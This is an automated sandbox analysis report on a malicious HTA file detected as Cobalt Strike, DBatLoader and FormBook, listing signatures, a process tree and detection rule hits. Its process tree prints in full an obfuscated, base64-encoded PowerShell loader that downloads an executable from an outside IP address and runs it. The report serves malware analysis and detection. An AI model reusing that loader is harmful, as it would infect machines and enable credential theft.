Windows
Analysis Report
fgd.hta
Overview
General Information
Detection
Cobalt Strike, DBatLoader, FormBook
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Detected Cobalt Strike Beacon
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected FormBook
Yara detected Powershell decode and execute
Allocates many large memory junks
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with a suspicious file extension
Drops PE files with benign system names
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
PowerShell case anomaly found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Parents
Sigma detected: System File Execution Location Anomaly
Sigma detected: Windows Binaries Write Suspicious Extensions
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Unusual Parent Process For Cmd.EXE
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
mshta.exe (PID: 3372 cmdline:
mshta.exe "C:\Users\ user\Deskt op\fgd.hta " MD5: 06B02D5C097C7DB1F109749C45F3F505) cmd.exe (PID: 4480 cmdline:
"C:\Window s\system32 \cmd.exe" "/C POwers hELl.ExE -EX Bypas S -n Op - W 1 -c DEVIC eCrEDEnTIA LdEPLoyMeN T.Exe ; iex($(iEX( '[SyStem.t Ext.ENCOdI nG]'+[ChAR ]0X3A+[ChA R]58+'Utf8 .getsTRing ([sYsTEm.C ONveRt]'+[ chAR]58+[c HaR]58+'FR OmbasE64st ring('+[Ch ar]34+'JGM xS3luICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgP SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIGFkRC1 0WVBFICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL U1lTWJlcmR FRklOaXRJT 04gICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAnW0R sbEltcG9yd CgiVVJsbW9 OLkRsbCIsI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgQ2hhclN ldCA9IENoY XJTZXQuVW5 pY29kZSldc HVibGljIHN 0YXRpYyBle HRlcm4gSW5 0UHRyIFVST ERvd25sb2F kVG9GaWxlK EludFB0ciA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIERock8sc 3RyaW5nICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA geGpiLHN0c mluZyAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIFI sdWludCAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI HR1LEludFB 0ciAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIEJna VNLZHFIUUU pOycgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAtb kFtZSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICJ ZT2giICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL U5BTUVzcGF DRSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIHhaU FogICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAtUGF zc1RocnU7I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgJGMxS3l uOjpVUkxEb 3dubG9hZFR vRmlsZSgwL CJodHRwOi8 vMTkyLjMuM jYuMTQzLzQ 3MC9jc3Jzc y5leGUiLCI kRW52OkFQU ERBVEFcY3N yc3MuZXhlI iwwLDApO1N 0YVJULXNsZ WVQKDMpO2l uVk9LRS1Jd EVtICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIiR lTnY6QVBQR EFUQVxjc3J zcy5leGUi' +[cHaR]0x2 2+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 5708 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 2424 cmdline:
POwershELl .ExE -EX BypasS -nOp -W 1 -c DEVICeCrE DEnTIALdEP LoyMeNT.Ex e ; iex( $(iEX('[Sy Stem.tExt. ENCOdInG]' +[ChAR]0X3 A+[ChAR]58 +'Utf8.get sTRing([sY sTEm.CONve Rt]'+[chAR ]58+[cHaR] 58+'FROmba sE64string ('+[Char]3 4+'JGMxS3l uICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgPSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI GFkRC10WVB FICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgLU1lT WJlcmRFRkl OaXRJT04gI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAnW0RsbEl tcG9ydCgiV VJsbW9OLkR sbCIsICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgQ 2hhclNldCA 9IENoYXJTZ XQuVW5pY29 kZSldcHVib GljIHN0YXR pYyBleHRlc m4gSW50UHR yIFVSTERvd 25sb2FkVG9 GaWxlKElud FB0ciAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIER ock8sc3Rya W5nICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgeGp iLHN0cmluZ yAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIFIsdWl udCAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIHR1L EludFB0ciA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIEJnaVNLZ HFIUUUpOyc gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAtbkFtZ SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICJZT2g iICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgLU5BT UVzcGFDRSA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIHhaUFogI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAtUGFzc1R ocnU7ICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgJ GMxS3luOjp VUkxEb3dub G9hZFRvRml sZSgwLCJod HRwOi8vMTk yLjMuMjYuM TQzLzQ3MC9 jc3Jzcy5le GUiLCIkRW5 2OkFQUERBV EFcY3Nyc3M uZXhlIiwwL DApO1N0YVJ ULXNsZWVQK DMpO2luVk9 LRS1JdEVtI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIiRlTnY 6QVBQREFUQ Vxjc3Jzcy5 leGUi'+[cH aR]0x22+') )')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) csc.exe (PID: 7232 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\z0uhqkog \z0uhqkog. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) cvtres.exe (PID: 7248 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S5F1A.tmp" "c:\Users \user\AppD ata\Local\ Temp\z0uhq kog\CSCA33 479D5CCDF4 88DBD48FF6 89C9305B.T MP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) csrss.exe (PID: 7676 cmdline:
"C:\Users\ user\AppDa ta\Roaming \csrss.exe " MD5: 848EBACD95EAD54CDCFE5D916093D2C8) cmd.exe (PID: 7728 cmdline:
C:\Windows \system32\ cmd.exe /c C:\\Progr amData\\75 91.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 7740 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 7776 cmdline:
C:\Windows \system32\ cmd.exe /c C:\\Progr amData\\37 991.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 7784 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) PING.EXE (PID: 7848 cmdline:
ping 127.0 .0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12) iaoqralA.pif (PID: 7840 cmdline:
C:\\Users\ \user\\Lin ks\iaoqral A.pif MD5: C116D3604CEAFE7057D77FF27552C215) 4nHrKBXqqqVJFZFp.exe (PID: 5660 cmdline:
"C:\Progra m Files (x 86)\iiJZba cQmSZDFoBW NIdigHSjJg uyOKZMdgAi MTRstzrzod taajzFnQfu CoVTBgFfPo ZoM\wgDVT7 rL.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A) systeminfo.exe (PID: 8116 cmdline:
"C:\Window s\SysWOW64 \systeminf o.exe" MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5) 4nHrKBXqqqVJFZFp.exe (PID: 2620 cmdline:
"C:\Progra m Files (x 86)\iiJZba cQmSZDFoBW NIdigHSjJg uyOKZMdgAi MTRstzrzod taajzFnQfu CoVTBgFfPo ZoM\7rPkWX E1JEx.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A) firefox.exe (PID: 7240 cmdline:
"C:\Progra m Files\Mo zilla Fire fox\Firefo x.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
svchost.exe (PID: 6920 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
DBatLoader | This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. |
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
Click to see the 4 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security | ||
JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security | ||
JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security | ||
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: frack113, Nasreddine Bencherchali: |
Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Michael Haag: |